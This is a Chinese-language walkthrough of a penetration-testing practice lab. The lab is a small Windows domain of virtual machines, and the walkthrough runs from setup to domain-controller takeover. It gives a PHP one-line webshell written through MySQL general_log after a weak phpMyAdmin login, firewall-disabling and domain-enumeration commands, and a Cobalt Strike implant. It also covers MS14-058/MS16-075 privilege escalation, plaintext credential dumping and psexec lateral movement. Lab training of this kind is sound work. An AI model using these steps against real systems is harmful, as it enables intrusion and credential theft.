环境配置给win2008、win2003和win7配置一个192.168.52.0网段的网卡win7额外配置一个网卡充当外网网卡这里nat是外网网卡vmnet1是内网网卡然后登录win7密码是hongrisec2019登陆后提示密码过期随便改一个密码比如admin123本地连接5是内网的网卡在控制面版找到网络连接将首选dns改为192.168.52.138IP地址如果不是对应外网网卡的网段可以手动配置。我的nat网段是192.168.14.0我这里最开始没有自动分配192.168.14.0网段所以选择手动配置执行net group domain controllers /domain看看能不能向域控请求如果出现发生系统错误5 。拒绝访问那就重装win7完成之后打开c盘的phpstudy环境搭建完毕外网渗透目录扫描开启80和3306远程连接3306连接不上对http页面扫描目录发现了phpmyadmi使用弱口令root/root登录写入一句话木马root权限登录看看能不能直接写一个一句话木马SHOW VARIABLES LIKE secure_file_priv;不能直接写入文件使用日志功能getshell查看是否开启日志show variables like general_log;开启日志set global general_logon;再次查看是否开启查看日志保存位置show variables like general_log_file;修改日志保存位置为WWW目录下set global general_log_fileC:\\phpStudy\\WWW\\mm.php;查看日志输出类型show variables like log_output;此时再执行select ?php eval($_POST[cmd]);?;即可将一句话木马写入使用蚁剑连接内网渗透内网信息收集参看当前用户查看有无杀软https://www.ddosi.org/av/tasklist /svc关闭防火墙netsh advfirewall set allprofiles state off上传cs后门程序上线cs查看网络信息ipconfig /all查看域net view /domain查看系统信息systeminfo查看域控机器名net group domain controllers /domain查看当前机器与其他机器通信情况arp -a至此可以知道域控IP是192.168.52.138域控机器名是OWA并且当前用户是在域内的只加入了一个域除了域控和本机还有一个192.168.52.141。最重要的是用户权限是域管权限接下来查看域管理员成员net group Domain Admins /domain查看本地管理员组net localgroup administrators已经是域管了不用考虑其他用户了域管默认可以连接ipc查看域控ipc共享文件net view \\192.168.52.138查看当前会话qwinsta /server:localhost权限提升接下来提权抓取密码根据前面systeminfo去查找提权exp可以找到很多提权漏洞使用ms14-058、ms16-075都可以提权横向移动使用插件抓取密码可以直接获取明文密码接下来使用psexec横向移动因为内网的机器不能出网需要通过入口机上线cs这里可以在cs中选择代理转发中的转发上线监听主机选择跳板机与域控通信的内网IP打开监听器可以看到多了一个监听在横向前需要在cs上扫描内网机器选择网络探测此时点击小电脑就可以看到扫描的结果域内几台机器右键选择横向移动、psexec将获得的信息填入监听选择跳板windows_dc等待一会就可以上线域控同样方法选择另一台机器机器成功上线